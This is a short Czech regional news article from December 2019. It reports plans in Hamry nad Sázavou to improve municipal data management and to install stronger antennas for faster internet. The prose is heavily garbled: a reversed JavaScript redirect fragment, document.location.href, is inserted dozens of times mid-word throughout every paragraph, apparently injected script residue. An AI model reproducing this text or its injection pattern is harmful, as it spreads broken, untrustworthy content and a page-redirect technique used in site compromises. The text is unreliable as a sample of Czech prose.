Rainbow page separator

Obyvatelé Hamrů se příští rok dočkají rychlejšího internetu

Neděle, 1. prosince 2019

Hamry nad Sázavou / Zlepšení správy veškerých digitálních dat, které obec má, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně jejich nutného zálohování, připravují v Hamrech nad Sázavou. Souvisí [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se zásadním posunem obce v oblasti informační techniky a internetu.
Při té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti zástupci vedení Hamrů počítají i s tím, že tamní obyvatelé budou mít k dispozici podstatně rychlejší internet.
K [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu má dojít tak, že na objektu základní školy bude umístěna silnější anténa, přičemž další anténa s větším výkonem bude nainstalována rovněž na budově obecního úřadu. Tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem má dojít k zajištění lepšího přenosu signálu ve směru k částem obce Najdek a Šlakhamry. Pokud bude záměr pokračovat podle plánu, ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo bude ještě před polovinou následujícího roku.